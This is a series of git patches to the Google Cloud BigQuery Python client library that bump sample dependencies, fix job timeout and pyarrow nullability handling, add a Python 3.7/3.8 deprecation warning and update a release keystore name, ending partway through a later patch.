From fabb2baebdc8a046c4fa00f9e1a65495430b927d Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 16 Aug 2024 21:24:33 +0200 Subject: [PATCH 001/202] chore(deps): update all dependencies (#1993) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * pin PyYAML===6.0.1 for python 3.7 * fix the version pinning --------- Co-authored-by: Owl Bot Co-authored-by: Lingqing Gan --- samples/geography/requirements.txt | 13 +++++++------ samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 4 ++-- 3 files changed, 10 insertions(+), 9 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 1a1cf4b04..f388c8248 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,25 +1,25 @@ -attrs==24.1.0 +attrs==24.2.0 certifi==2024.7.4 cffi===1.15.1; python_version == '3.7' -cffi==1.16.0; python_version >= '3.8' +cffi==1.17.0; python_version >= '3.8' charset-normalizer==3.3.2 click==8.1.7 click-plugins==1.1.1 cligj==0.7.2 dataclasses==0.8; python_version < '3.7' -db-dtypes==1.2.0 +db-dtypes==1.3.0 Fiona==1.9.6 geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' google-api-core==2.19.1 -google-auth==2.32.0 +google-auth==2.33.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 google-cloud-core==2.4.1 google-crc32c==1.5.0 -google-resumable-media==2.7.1 +google-resumable-media==2.7.2 googleapis-common-protos==1.63.2 grpcio===1.62.2; python_version == '3.7' grpcio==1.65.4; python_version >= '3.8' @@ -43,7 +43,8 @@ pycparser==2.22; python_version >= '3.8' pyparsing==3.1.2 python-dateutil==2.9.0.post0 pytz==2024.1 -PyYAML==6.0.1 +PyYAML===6.0.1; python_version == '3.7' +PyYAML==6.0.2; python_version >= '3.8' requests==2.31.0; python_version == '3.7' requests==2.32.3; python_version >= '3.8' rsa==4.9 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index a1044c231..956b168dd 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,5 +1,5 @@ bigquery_magics==0.1.0 -db-dtypes==1.2.0 +db-dtypes==1.3.0 google.cloud.bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 ipython===7.31.1; python_version == '3.7' diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 81fa3782c..42b1243eb 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,5 +1,5 @@ bigquery-magics==0.1.0 -db-dtypes==1.2.0 +db-dtypes==1.3.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 ipython===7.31.1; python_version == '3.7' @@ -7,7 +7,7 @@ ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' matplotlib===3.5.3; python_version == '3.7' matplotlib===3.7.4; python_version == '3.8' -matplotlib==3.9.1; python_version >= '3.9' +matplotlib==3.9.2; python_version >= '3.9' pandas===1.3.5; python_version == '3.7' pandas===2.0.3; python_version == '3.8' pandas==2.2.2; python_version >= '3.9' From edcb79ca69dba30d8102abebb9d53bc76e4882ee Mon Sep 17 00:00:00 2001 From: Misha Behersky Date: Mon, 19 Aug 2024 21:15:10 +0300 Subject: [PATCH 002/202] fix: do not set job timeout extra property if None (#1987) Co-authored-by: Lingqing Gan --- google/cloud/bigquery/job/base.py | 7 +++++-- tests/unit/job/test_base.py | 18 ++++++++++++++++++ 2 files changed, 23 insertions(+), 2 deletions(-) diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index f165fd036..e5f68c843 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -218,8 +218,11 @@ def job_timeout_ms(self, value): err.__traceback__ ) - """ Docs indicate a string is expected by the API """ - self._properties["jobTimeoutMs"] = str(value) + if value is not None: + # docs indicate a string is expected by the API + self._properties["jobTimeoutMs"] = str(value) + else: + self._properties.pop("jobTimeoutMs", None) @property def labels(self): diff --git a/tests/unit/job/test_base.py b/tests/unit/job/test_base.py index a7337afd2..2d2f0c13c 100644 --- a/tests/unit/job/test_base.py +++ b/tests/unit/job/test_base.py @@ -1320,3 +1320,21 @@ def test_job_timeout_ms(self): # Confirm that integers get converted to strings. job_config.job_timeout_ms = 5000 assert job_config.job_timeout_ms == "5000" # int is converted to string + + def test_job_timeout_is_none_when_set_none(self): + job_config = self._make_one() + job_config.job_timeout_ms = None + # Confirm value is None and not literal string 'None' + assert job_config.job_timeout_ms is None + + def test_job_timeout_properties(self): + # Make sure any value stored in properties is erased + # when setting job_timeout to None. + job_config = self._make_one() + job_config.job_timeout_ms = 4200 + assert job_config.job_timeout_ms == "4200" + assert job_config._properties.get("jobTimeoutMs") == "4200" + + job_config.job_timeout_ms = None + assert job_config.job_timeout_ms is None + assert "jobTimeoutMs" not in job_config._properties From 5352870283ca7d4652aefc73f12645bcf6e1363c Mon Sep 17 00:00:00 2001 From: Yilin Xu Date: Tue, 20 Aug 2024 06:21:01 -0700 Subject: [PATCH 003/202] fix: set pyarrow field nullable to False for a BigQuery field in REPEATED mode (#1999) Co-authored-by: Lingqing Gan --- google/cloud/bigquery/_pandas_helpers.py | 2 +- tests/unit/test__pandas_helpers.py | 17 +++++++++++++++++ 2 files changed, 18 insertions(+), 1 deletion(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index c21a02569..210ab4875 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -200,7 +200,7 @@ def bq_to_arrow_field(bq_field, array_type=None): # local NULL values. Arrow will gladly interpret these NULL values # as non-NULL and give you an arbitrary value. See: # https://github.com/googleapis/python-bigquery/issues/1692 - nullable=True, + nullable=False if bq_field.mode.upper() == "REPEATED" else True, metadata=metadata, ) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index 58d2b73b3..203cc1d1c 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -2002,6 +2002,23 @@ def test_bq_to_arrow_field_type_override(module_under_test): ) +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") +def test_bq_to_arrow_field_set_repeated_nullable_false(module_under_test): + assert ( + module_under_test.bq_to_arrow_field( + schema.SchemaField("name", "STRING", mode="REPEATED") + ).nullable + is False + ) + + assert ( + module_under_test.bq_to_arrow_field( + schema.SchemaField("name", "STRING", mode="NULLABLE") + ).nullable + is True + ) + + @pytest.mark.parametrize( "field_type, metadata", [ From 1bfc761e15fae000f2a983e90dfc838ca9af4c3e Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 27 Aug 2024 20:17:04 +0200 Subject: [PATCH 004/202] chore(deps): update all dependencies (#2002) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 8 ++++---- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index f388c8248..892c1524e 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -14,7 +14,7 @@ geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' google-api-core==2.19.1 -google-auth==2.33.0 +google-auth==2.34.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 google-cloud-core==2.4.1 @@ -22,8 +22,8 @@ google-crc32c==1.5.0 google-resumable-media==2.7.2 googleapis-common-protos==1.63.2 grpcio===1.62.2; python_version == '3.7' -grpcio==1.65.4; python_version >= '3.8' -idna==3.7 +grpcio==1.66.0; python_version >= '3.8' +idna==3.8 munch==4.0.0 mypy-extensions==1.0.0 packaging===24.0; python_version == '3.7' @@ -48,7 +48,7 @@ PyYAML==6.0.2; python_version >= '3.8' requests==2.31.0; python_version == '3.7' requests==2.32.3; python_version >= '3.8' rsa==4.9 -Shapely==2.0.5 +Shapely==2.0.6 six==1.16.0 typing-extensions===4.7.1; python_version == '3.7' typing-extensions==4.12.2; python_version >= '3.8' diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index 956b168dd..b08ecad7e 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,4 +1,4 @@ -bigquery_magics==0.1.0 +bigquery_magics==0.1.1 db-dtypes==1.3.0 google.cloud.bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 42b1243eb..0467676fc 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,4 +1,4 @@ -bigquery-magics==0.1.0 +bigquery-magics==0.1.1 db-dtypes==1.3.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.25.0 From ea69fe315592f3a73417f175b1fe4543203cb716 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 28 Aug 2024 01:08:51 +0200 Subject: [PATCH 005/202] chore(deps): update all dependencies (#2004) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 892c1524e..25dd4b319 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -20,7 +20,7 @@ google-cloud-bigquery-storage==2.25.0 google-cloud-core==2.4.1 google-crc32c==1.5.0 google-resumable-media==2.7.2 -googleapis-common-protos==1.63.2 +googleapis-common-protos==1.65.0 grpcio===1.62.2; python_version == '3.7' grpcio==1.66.0; python_version >= '3.8' idna==3.8 @@ -40,7 +40,7 @@ pyasn1-modules===0.3.0; python_version == '3.7' pyasn1-modules==0.4.0; python_version >= '3.8' pycparser===2.21; python_version == '3.7' pycparser==2.22; python_version >= '3.8' -pyparsing==3.1.2 +pyparsing==3.1.4 python-dateutil==2.9.0.post0 pytz==2024.1 PyYAML===6.0.1; python_version == '3.7' From 7af65236c928b105299f158084029cf45438e56e Mon Sep 17 00:00:00 2001 From: shollyman Date: Wed, 4 Sep 2024 12:09:39 -0700 Subject: [PATCH 006/202] testing: remove testing identity override (#2011) * testing: remove testing identity override This PR removes a stale reference to a membership group in samples tests. --- samples/snippets/view.py | 2 +- samples/snippets/view_test.py | 3 +-- 2 files changed, 2 insertions(+), 3 deletions(-) diff --git a/samples/snippets/view.py b/samples/snippets/view.py index 94f406890..30e719c79 100644 --- a/samples/snippets/view.py +++ b/samples/snippets/view.py @@ -147,7 +147,7 @@ def grant_access( # Make an API request to get the view dataset ACLs. view_dataset = client.get_dataset(view_dataset_id) - analyst_group_email = "data_analysts@example.com" + analyst_group_email = "example-analyst-group@google.com" # [END bigquery_grant_view_access] # To facilitate testing, we replace values with alternatives # provided by the testing harness. diff --git a/samples/snippets/view_test.py b/samples/snippets/view_test.py index dfa1cdeee..d46595695 100644 --- a/samples/snippets/view_test.py +++ b/samples/snippets/view_test.py @@ -114,7 +114,6 @@ def test_view( project_id, dataset_id, table_id = view_id.split(".") overrides: view.OverridesDict = { - "analyst_group_email": "cloud-dpes-bigquery@google.com", "view_dataset_id": view_dataset_id, "source_dataset_id": source_dataset_id, "view_reference": { @@ -127,5 +126,5 @@ def test_view( assert len(view_dataset.access_entries) != 0 assert len(source_dataset.access_entries) != 0 out, _ = capsys.readouterr() - assert "cloud-dpes-bigquery@google.com" in out + assert "example-analyst-group@google.com" in out assert table_id in out From 3ab5e95984ad521027a4e1efd9f16767403e668d Mon Sep 17 00:00:00 2001 From: shollyman Date: Thu, 5 Sep 2024 11:28:49 -0700 Subject: [PATCH 007/202] feat: include LegacyPandasError in init imports (#2014) --- google/cloud/bigquery/__init__.py | 1 + 1 file changed, 1 insertion(+) diff --git a/google/cloud/bigquery/__init__.py b/google/cloud/bigquery/__init__.py index e80907ec9..26d03286f 100644 --- a/google/cloud/bigquery/__init__.py +++ b/google/cloud/bigquery/__init__.py @@ -44,6 +44,7 @@ from google.cloud.bigquery.enums import SqlTypeNames from google.cloud.bigquery.enums import StandardSqlTypeNames from google.cloud.bigquery.exceptions import LegacyBigQueryStorageError +from google.cloud.bigquery.exceptions import LegacyPandasError from google.cloud.bigquery.exceptions import LegacyPyarrowError from google.cloud.bigquery.external_config import ExternalConfig from google.cloud.bigquery.external_config import BigtableOptions From f0a41618f10e754863617e9efa32707814ca895d Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 10 Sep 2024 21:13:15 +0200 Subject: [PATCH 008/202] chore(deps): update all dependencies (#2005) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * add version constraint for google-crc32c --------- Co-authored-by: Owl Bot Co-authored-by: Leah Cole --- samples/geography/requirements.txt | 13 +++++++------ samples/magics/requirements.txt | 4 ++-- samples/notebooks/requirements.txt | 4 ++-- 3 files changed, 11 insertions(+), 10 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 25dd4b319..cfb27cca9 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -1,7 +1,7 @@ attrs==24.2.0 -certifi==2024.7.4 +certifi==2024.8.30 cffi===1.15.1; python_version == '3.7' -cffi==1.17.0; python_version >= '3.8' +cffi==1.17.1; python_version >= '3.8' charset-normalizer==3.3.2 click==8.1.7 click-plugins==1.1.1 @@ -13,16 +13,17 @@ geojson==3.1.0 geopandas===0.10.2; python_version == '3.7' geopandas===0.13.2; python_version == '3.8' geopandas==1.0.1; python_version >= '3.9' -google-api-core==2.19.1 +google-api-core==2.19.2 google-auth==2.34.0 google-cloud-bigquery==3.25.0 -google-cloud-bigquery-storage==2.25.0 +google-cloud-bigquery-storage==2.26.0 google-cloud-core==2.4.1 -google-crc32c==1.5.0 +google-crc32c==1.5.0; python_version < '3.9' +google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.65.0 grpcio===1.62.2; python_version == '3.7' -grpcio==1.66.0; python_version >= '3.8' +grpcio==1.66.1; python_version >= '3.8' idna==3.8 munch==4.0.0 mypy-extensions==1.0.0 diff --git a/samples/magics/requirements.txt b/samples/magics/requirements.txt index b08ecad7e..f18db407e 100644 --- a/samples/magics/requirements.txt +++ b/samples/magics/requirements.txt @@ -1,7 +1,7 @@ -bigquery_magics==0.1.1 +bigquery_magics==0.2.0 db-dtypes==1.3.0 google.cloud.bigquery==3.25.0 -google-cloud-bigquery-storage==2.25.0 +google-cloud-bigquery-storage==2.26.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' diff --git a/samples/notebooks/requirements.txt b/samples/notebooks/requirements.txt index 0467676fc..0b906c4ea 100644 --- a/samples/notebooks/requirements.txt +++ b/samples/notebooks/requirements.txt @@ -1,7 +1,7 @@ -bigquery-magics==0.1.1 +bigquery-magics==0.2.0 db-dtypes==1.3.0 google-cloud-bigquery==3.25.0 -google-cloud-bigquery-storage==2.25.0 +google-cloud-bigquery-storage==2.26.0 ipython===7.31.1; python_version == '3.7' ipython===8.0.1; python_version == '3.8' ipython===8.18.1; python_version >= '3.9' From 325519afc80133aabe81ca069f2b891ef990acb6 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Wed, 11 Sep 2024 18:11:59 +0200 Subject: [PATCH 009/202] chore(deps): update all dependencies (#2017) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update samples/geography/requirements.txt --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- samples/desktopapp/requirements-test.txt | 2 +- samples/geography/requirements-test.txt | 2 +- samples/magics/requirements-test.txt | 2 +- samples/notebooks/requirements-test.txt | 2 +- samples/snippets/requirements-test.txt | 2 +- 5 files changed, 5 insertions(+), 5 deletions(-) diff --git a/samples/desktopapp/requirements-test.txt b/samples/desktopapp/requirements-test.txt index 68f9039cc..1640e1a95 100644 --- a/samples/desktopapp/requirements-test.txt +++ b/samples/desktopapp/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.4.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.2; python_version >= '3.8' +pytest==8.3.3; python_version >= '3.8' mock==5.1.0 diff --git a/samples/geography/requirements-test.txt b/samples/geography/requirements-test.txt index 335236a14..1ccebd9cd 100644 --- a/samples/geography/requirements-test.txt +++ b/samples/geography/requirements-test.txt @@ -1,3 +1,3 @@ pytest===7.4.4; python_version == '3.7' -pytest==8.3.2; python_version >= '3.8' +pytest==8.3.3; python_version >= '3.8' mock==5.1.0 diff --git a/samples/magics/requirements-test.txt b/samples/magics/requirements-test.txt index 68f9039cc..1640e1a95 100644 --- a/samples/magics/requirements-test.txt +++ b/samples/magics/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.4.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.2; python_version >= '3.8' +pytest==8.3.3; python_version >= '3.8' mock==5.1.0 diff --git a/samples/notebooks/requirements-test.txt b/samples/notebooks/requirements-test.txt index 68f9039cc..1640e1a95 100644 --- a/samples/notebooks/requirements-test.txt +++ b/samples/notebooks/requirements-test.txt @@ -1,4 +1,4 @@ google-cloud-testutils==1.4.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.2; python_version >= '3.8' +pytest==8.3.3; python_version >= '3.8' mock==5.1.0 diff --git a/samples/snippets/requirements-test.txt b/samples/snippets/requirements-test.txt index 083b20271..bb0b2a6bf 100644 --- a/samples/snippets/requirements-test.txt +++ b/samples/snippets/requirements-test.txt @@ -1,5 +1,5 @@ # samples/snippets should be runnable with no "extras" google-cloud-testutils==1.4.0 pytest===7.4.4; python_version == '3.7' -pytest==8.3.2; python_version >= '3.8' +pytest==8.3.3; python_version >= '3.8' mock==5.1.0 From 1b4cca0a3cc788a4570705572d5f04172f6b4b24 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Wed, 11 Sep 2024 11:35:42 -0700 Subject: [PATCH 010/202] docs: improve QueryJobConfig.destination docstring (#2016) * docs: improve QueryJobConfig.destination docstring * add space --- google/cloud/bigquery/job/query.py | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/google/cloud/bigquery/job/query.py b/google/cloud/bigquery/job/query.py index 4ea5687e0..ca2448eaa 100644 --- a/google/cloud/bigquery/job/query.py +++ b/google/cloud/bigquery/job/query.py @@ -476,6 +476,11 @@ def destination(self): ID, each separated by ``.``. For example: ``your-project.your_dataset.your_table``. + .. note:: + + Only table ID is passed to the backend, so any configuration + in `~google.cloud.bigquery.table.Table` is discarded. + See https://cloud.google.com/bigquery/docs/reference/rest/v2/Job#JobConfigurationQuery.FIELDS.destination_table """ From 847feb48c26e96fdcb1393458f370c79d4c92fed Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Wed, 11 Sep 2024 17:16:06 -0400 Subject: [PATCH 011/202] chore: adds Python 3.7/3.8 EOL pending deprecation warning (#2007) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * adds pending deprecation warning * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * revise code to put version function in version helpers * Update noxfile.py * Update google/cloud/bigquery/__init__.py --------- Co-authored-by: Owl Bot Co-authored-by: Lingqing Gan --- google/cloud/bigquery/__init__.py | 13 ++++++++++++ google/cloud/bigquery/_versions_helpers.py | 14 +++++++++++++ noxfile.py | 23 +++++++++++++++++++--- 3 files changed, 47 insertions(+), 3 deletions(-) diff --git a/google/cloud/bigquery/__init__.py b/google/cloud/bigquery/__init__.py index 26d03286f..caf75333a 100644 --- a/google/cloud/bigquery/__init__.py +++ b/google/cloud/bigquery/__init__.py @@ -115,12 +115,25 @@ from google.cloud.bigquery.table import TimePartitioningType from google.cloud.bigquery.table import TimePartitioning from google.cloud.bigquery.encryption_configuration import EncryptionConfiguration +from google.cloud.bigquery import _versions_helpers try: import bigquery_magics # type: ignore except ImportError: bigquery_magics = None +sys_major, sys_minor, sys_micro = _versions_helpers.extract_runtime_version() + +if sys_major == 3 and sys_minor in (7, 8): + warnings.warn( + "The python-bigquery library will stop supporting Python 3.7 " + "and Python 3.8 in a future major release expected in Q4 2024. " + f"Your Python version is {sys_major}.{sys_minor}.{sys_micro}. We " + "recommend that you update soon to ensure ongoing support. For " + "more details, see: [Google Cloud Client Libraries Supported Python Versions policy](https://cloud.google.com/python/docs/supported-python-versions)", + PendingDeprecationWarning, + ) + __all__ = [ "__version__", "Client", diff --git a/google/cloud/bigquery/_versions_helpers.py b/google/cloud/bigquery/_versions_helpers.py index 72d4c921d..cfbf70a8e 100644 --- a/google/cloud/bigquery/_versions_helpers.py +++ b/google/cloud/bigquery/_versions_helpers.py @@ -14,6 +14,7 @@ """Shared helper functions for verifying versions of installed modules.""" +import sys from typing import Any import packaging.version @@ -248,3 +249,16 @@ def try_import(self, raise_if_error: bool = False) -> Any: and PYARROW_VERSIONS.try_import() is not None and PYARROW_VERSIONS.installed_version >= _MIN_PYARROW_VERSION_RANGE ) + + +def extract_runtime_version(): + # Retrieve the version information + version_info = sys.version_info + + # Extract the major, minor, and micro components + major = version_info.major + minor = version_info.minor + micro = version_info.micro + + # Display the version number in a clear format + return major, minor, micro diff --git a/noxfile.py b/noxfile.py index a2df2e094..2376309ff 100644 --- a/noxfile.py +++ b/noxfile.py @@ -116,6 +116,7 @@ def default(session, install_extras=True): session.run( "py.test", "--quiet", + "-W default::PendingDeprecationWarning", "--cov=google/cloud/bigquery", "--cov=tests/unit", "--cov-append", @@ -231,6 +232,7 @@ def system(session): session.run( "py.test", "--quiet", + "-W default::PendingDeprecationWarning", os.path.join("tests", "system"), *session.posargs, ) @@ -299,6 +301,7 @@ def snippets(session): session.run( "py.test", "samples", + "-W default::PendingDeprecationWarning", "--ignore=samples/desktopapp", "--ignore=samples/magics", "--ignore=samples/geography", @@ -401,9 +404,23 @@ def prerelease_deps(session): session.run("python", "-m", "pip", "freeze") # Run all tests, except a few samples tests which require extra dependencies. - session.run("py.test", "tests/unit") - session.run("py.test", "tests/system") - session.run("py.test", "samples/tests") + session.run( + "py.test", + "tests/unit", + "-W default::PendingDeprecationWarning", + ) + + session.run( + "py.test", + "tests/system", + "-W default::PendingDeprecationWarning", + ) + + session.run( + "py.test", + "samples/tests", + "-W default::PendingDeprecationWarning", + ) @nox.session(python=DEFAULT_PYTHON_VERSION) From 255472359f3ed6b6cee06039ebe9059607fd9894 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Thu, 12 Sep 2024 16:44:54 +0200 Subject: [PATCH 012/202] chore(deps): update all dependencies (#2018) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * Update samples/geography/requirements.txt --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe Co-authored-by: Leah E. Cole <6719667+leahecole@users.noreply.github.com> --- samples/geography/requirements.txt | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index cfb27cca9..350419781 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -18,7 +18,7 @@ google-auth==2.34.0 google-cloud-bigquery==3.25.0 google-cloud-bigquery-storage==2.26.0 google-cloud-core==2.4.1 -google-crc32c==1.5.0; python_version < '3.9' +google-crc32c===1.5.0; python_version < '3.9' google-crc32c==1.6.0; python_version >= '3.9' google-resumable-media==2.7.2 googleapis-common-protos==1.65.0 @@ -36,14 +36,14 @@ proto-plus==1.24.0 pyarrow==12.0.1; python_version == '3.7' pyarrow==17.0.0; python_version >= '3.8' pyasn1===0.5.1; python_version == '3.7' -pyasn1==0.6.0; python_version >= '3.8' +pyasn1==0.6.1; python_version >= '3.8' pyasn1-modules===0.3.0; python_version == '3.7' -pyasn1-modules==0.4.0; python_version >= '3.8' +pyasn1-modules==0.4.1; python_version >= '3.8' pycparser===2.21; python_version == '3.7' pycparser==2.22; python_version >= '3.8' pyparsing==3.1.4 python-dateutil==2.9.0.post0 -pytz==2024.1 +pytz==2024.2 PyYAML===6.0.1; python_version == '3.7' PyYAML==6.0.2; python_version >= '3.8' requests==2.31.0; python_version == '3.7' From b561aaf6bb744300ca668b37e8cb047dc3d428be Mon Sep 17 00:00:00 2001 From: "gcf-owl-bot[bot]" <78513119+gcf-owl-bot[bot]@users.noreply.github.com> Date: Tue, 17 Sep 2024 11:18:05 -0400 Subject: [PATCH 013/202] build(python): release script update (#2024) Source-Link: https://github.com/googleapis/synthtool/commit/71a72973dddbc66ea64073b53eda49f0d22e0942 Post-Processor: gcr.io/cloud-devrel-public-resources/owlbot-python:latest@sha256:e8dcfd7cbfd8beac3a3ff8d3f3185287ea0625d859168cc80faccfc9a7a00455 Co-authored-by: Owl Bot --- .github/.OwlBot.lock.yaml | 4 ++-- .kokoro/release.sh | 2 +- .kokoro/release/common.cfg | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/.github/.OwlBot.lock.yaml b/.github/.OwlBot.lock.yaml index 6d064ddb9..597e0c326 100644 --- a/.github/.OwlBot.lock.yaml +++ b/.github/.OwlBot.lock.yaml @@ -13,5 +13,5 @@ # limitations under the License. docker: image: gcr.io/cloud-devrel-public-resources/owlbot-python:latest - digest: sha256:94bb690db96e6242b2567a4860a94d48fa48696d092e51b0884a1a2c0a79a407 -# created: 2024-07-31T14:52:44.926548819Z + digest: sha256:e8dcfd7cbfd8beac3a3ff8d3f3185287ea0625d859168cc80faccfc9a7a00455 +# created: 2024-09-16T21:04:09.091105552Z diff --git a/.kokoro/release.sh b/.kokoro/release.sh index 81cee716e..453d6f702 100755 --- a/.kokoro/release.sh +++ b/.kokoro/release.sh @@ -23,7 +23,7 @@ python3 -m releasetool publish-reporter-script > /tmp/publisher-script; source / export PYTHONUNBUFFERED=1 # Move into the package, build the distribution and upload. -TWINE_PASSWORD=$(cat "${KOKORO_KEYSTORE_DIR}/73713_google-cloud-pypi-token-keystore-1") +TWINE_PASSWORD=$(cat "${KOKORO_KEYSTORE_DIR}/73713_google-cloud-pypi-token-keystore-2") cd github/python-bigquery python3 setup.py sdist bdist_wheel twine upload --username __token__ --password "${TWINE_PASSWORD}" dist/* diff --git a/.kokoro/release/common.cfg b/.kokoro/release/common.cfg index cb8bbaa2e..43b5a1f27 100644 --- a/.kokoro/release/common.cfg +++ b/.kokoro/release/common.cfg @@ -28,7 +28,7 @@ before_action { fetch_keystore { keystore_resource { keystore_config_id: 73713 - keyname: "google-cloud-pypi-token-keystore-1" + keyname: "google-cloud-pypi-token-keystore-2" } } } From ef8e92787941ed23b9b2b5ce7c956bcb3754b995 Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Fri, 20 Sep 2024 23:21:58 +0200 Subject: [PATCH 014/202] chore(deps): update all dependencies (#2025) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/samples/geography/requirements.txt b/samples/geography/requirements.txt index 350419781..aa2ccfc28 100644 --- a/samples/geography/requirements.txt +++ b/samples/geography/requirements.txt @@ -24,7 +24,7 @@ google-resumable-media==2.7.2 googleapis-common-protos==1.65.0 grpcio===1.62.2; python_version == '3.7' grpcio==1.66.1; python_version >= '3.8' -idna==3.8 +idna==3.10 munch==4.0.0 mypy-extensions==1.0.0 packaging===24.0; python_version == '3.7' From ba99b12215995448998fccb6691423f4555a73bf Mon Sep 17 00:00:00 2001 From: Mend Renovate Date: Tue, 24 Sep 2024 19:46:21 +0200 Subject: [PATCH 015/202] chore(deps): update all dependencies (#2029) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * chore(deps): update all dependencies * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md --------- Co-authored-by: Owl Bot --- samples/geography/requirements.txt | 6 +++--- samples/magics/requirements.txt | 2 +- samples/notebooks/requirements.txt | 2 +- 3 files changed, 